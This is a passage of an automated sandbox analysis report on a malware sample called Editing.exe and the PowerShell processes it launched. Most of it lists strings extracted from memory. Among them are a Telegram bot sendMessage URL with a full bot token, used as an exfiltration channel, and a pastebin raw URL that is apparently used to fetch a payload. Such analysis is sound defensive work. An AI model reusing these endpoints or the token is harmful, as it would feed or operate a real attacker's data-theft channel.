Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000002.00000002.2184575792.000002B10B428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3213329028.00000284CD5B0000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2184575792.000002B10B201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2191077266.0000020A62521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2184575792.000002B10B428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2404365752.000001E2F6E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coW
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFD6000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: Editing.exe, 00000000.00000002.3212619407.00000284CCC93000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/download
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/info
Source: Editing.exeString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
Source: Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000002.00000002.2184575792.000002B10B201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2191077266.0000020A62521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2300636832.000001E280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: Editing.exe, 00000000.00000002.3212913296.00000284CCFD6000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: Editing.exe, 00000000.00000002.3211502508.000002443A800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3211502508.000002443A8A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage
Source: Editing.exe, 00000000.00000002.3211502508.000002443A843000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage?chat_id=-1002
Source: powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2300636832.000001E280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: Editing.exe, 00000000.00000002.3215366959.00000284D0252000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/50820
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000004.00000002.2191077266.0000020A63153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2224756243.000002B11B271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2269834300.0000020A726D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380127260.000001E290070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2191077266.0000020A63153000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.2188700328.0000020A608D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51668
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51882
Source: unknownNetwork traffic detected: HTTP traffic on port 51881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 443
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:51668 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343BEB7D NtWriteVirtualMemory,4_2_00007FFD343BEB7D
Source: C:\Users\user\Desktop\ Editing.exeCode function: 0_2_00007FF5E721306F0_2_00007FF5E721306F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B70FB4_2_00007FFD343B70FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343BBC714_2_00007FFD343BBC71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B59D04_2_00007FFD343B59D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B5E514_2_00007FFD343B5E51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B85FA4_2_00007FFD343B85FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B4B524_2_00007FFD343B4B52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B7AFC4_2_00007FFD343B7AFC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B86FA4_2_00007FFD343B86FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B4BD34_2_00007FFD343B4BD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B6FD34_2_00007FFD343B6FD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B27654_2_00007FFD343B2765
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343BDB6D4_2_00007FFD343BDB6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD343B84454_2_00007FFD343B8445
Source: Editing.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: Editing.exeBinary or memory string: OriginalFilename vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216610266.00000284D1481000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.SystemEvents.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Linq.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.RegularExpressions.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.ReaderWriter.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212109314.00000284CC9A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212130123.00000284CC9B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNETdesign.dll4 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.DataContractSerialization.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Emit.ILGeneration.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211198846.0000024437CF2000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWorkTeam.dll2 vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211317727.0000024437D40000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214493572.00000284CFE00000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3215920817.00000284D08B0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Reflection.Primitives.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3211294592.0000024437D31000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3213770399.00000284CF971000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs Editing.exe
Source: Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs Editing.exe
